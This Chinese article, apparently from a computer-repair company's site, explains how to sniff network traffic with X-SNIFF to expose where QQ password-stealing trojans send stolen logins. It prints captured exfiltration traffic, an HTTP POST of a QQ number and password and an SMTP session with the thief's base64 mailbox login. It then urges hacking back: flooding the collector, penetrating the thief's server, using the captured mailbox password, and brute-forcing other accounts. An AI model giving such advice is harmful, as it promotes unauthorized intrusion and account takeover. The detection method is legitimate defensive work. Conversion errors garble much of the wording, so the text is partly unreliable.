设为主页 | 加入收藏 | 繁體中文

如何冷静应对偷QQ程序

  现在盗QQ的步伐越做越好了。粉碎锁后图标弄成和正常的一样。这就让人郁闷了。
  不外不要紧,让我来教你怎样对付它!
  首先准备好家伙
  :X-SNIFF
  进入X-SNIFF地点目录后
  运行下令:xsniff -tcp -asc -pass -log qq.txt
  ===========================
  小知识:
  为什么要输入这下令呢?
  -tcp
  嗅探全部通过TCP协议传输的包
  tcp嗅探形式最好配合-asc参数 以ASCII形式输入嗅探数据
  这样像“阿拉”那些用ASP来收信的木马的收信地点就会被我们嗅到了!
  -pass
  嗅探暗码
  用此参数,可以嗅探到用EMAIL收信的QQ木马的相应EMAIL及帐号暗码
  ===========================
  然后打开QQ登岸窗口
  随便输入一个QQ号和暗码然后登岸
  等呈现正登岸的窗口时就可以关掉QQ了(当然,你也可以等到暗码报错时关甚至使用真的QQ)
  这时,不论是ASP收信还是EMAIL收信的盗QQ木马都会现出本相
  例子1:
  阿拉的ASP收信形式(嗅探效果)
  POST /ald/tmdqq.asp HTTP/1.1
  Accept: Accept: */*, /ald/tmdqq.asp, 192.168.0.6
  Content-Type: application/x-www-form-urlencoded
  User-Agent: MyApp
  Host: http:// 192.168.0.6/ald/tmdqq.asp
  Content-Length: 25
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDCCTQCARD=GFNGKMAAILIKOIBLPJAOOFON
  num=74444444&pass=netpatch
  他的收信地点为:
  http:// 192.168.0.6/ald/tmdqq.asp
  收信参数为
  num=74444444&pass=netpatch
  提交形式为:
  http:// 192.168.0.6/ald/tmdqq.asp?num=74444444&pass=netpatch
  例子2:
  阿拉的Email收信形式(嗅探效果)
  TCP  192.168.0.77->202.108.5.141 Port: 1049->25
  Bytes=12 TTL=128 Len=80 ---PA-
  AUTH LOGIN  //恳求登岸邮件办事器
  TCP  202.108.5.141->192.168.0.77 Port: 25->1049
  Bytes=18 TTL=52 Len=80 ---PA-
  334 dXNlcm5hbWU6  //办事器要求输入用户名
  TCP  192.168.0.77->202.108.5.141 Port: 1049->25
  Bytes=10 TTL=128 Len=80 ---PA-
  dHJ5NHFx  //盗贼的EMAIL的ID(base64加密)
  TCP  202.108.5.141->192.168.0.77 Port: 25->1049
  Bytes=18 TTL=52 Len=80 ---PA-
  334 UGFzc3dvcmQ6  //办事器要求输入EMAIL登岸暗码
  TCP  192.168.0.77->202.108.5.141 Port: 1049->25
  Bytes=10 TTL=128 Len=80 ---PA-
  NzQxODUy //盗贼的EMAIL登岸暗码(base64加密)
  TCP  202.108.5.141->192.168.0.77 Port: 25->1049
  Bytes=31 TTL=52 Len=80 ---PA-
  235 Authentication successful //办事器反馈登岸成功标志
  TCP  192.168.0.77->202.108.5.141 Port: 1049->25
  Bytes=29 TTL=128 Len=80 ---PA-
  MAIL FROM: //QQ暗码发信地点
  TCP  202.108.5.141->192.168.0.77 Port: 25->1049
  Bytes=13 TTL=52 Len=80 ---PA-
  250 Mail OK //反馈设置信息
  TCP  192.168.0.77->202.108.5.141 Port: 1049->25
  Bytes=27 TTL=128 Len=80 ---PA-
  RCPT T //QQ暗码收信地点
  TCP  202.108.5.141->192.168.0.77 Port: 25->1049
  Bytes=13 TTL=52 Len=80 ---PA-
  250 Mail OK //反馈设置信息
  TCP  192.168.0.77->202.108.5.141 Port: 1049->25
  Bytes=6 TTL=128 Len=80 ---PA-
  DATA
  TCP  202.108.5.141->192.168.0.77 Port: 25->1049
  Bytes=37 TTL=52 Len=80 ---PA-
  354 End data with .
  TCP  192.168.0.77->202.108.5.141 Port: 1049->25
  Bytes=345 TTL=128 Len=80 ---PA-
  From: ................
  T
  Subject:77777----netpatch //QQ号码和暗码
  Content-Type: text/html; charset="GB2312"
  L9NTdhkmuwwx113368ACGHJLNQQSUW
 
------------------------------
 
....:77777
 
....:netpatch
 
------------------------------
 
IP....:218.104.xxx.xxx
 
........:................
  这时,我们可以有2种要领对付这种偷QQ的
  1。用我写的 啊拉ASP收信 攻击步伐,发他几万个加QQ和暗码已往让他试个爽
  2。渗透那办事器。
  对付EMAIL接收的,如果对方只用一个EMAIL,那就简略了,拿到暗码和ID,你说能做什么呢?如果对方用两个EMAIL,就看你的运气啦,看看暗码是否雷同或相近?用社会工程学或爆破其暗码!
  再不可,还是一样,发一堆假的已往。大概再想别的措施。
  其他的盗Q步伐基真雷同。我就不多说了。
  =========================
  有什么错误,请品评指正!
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: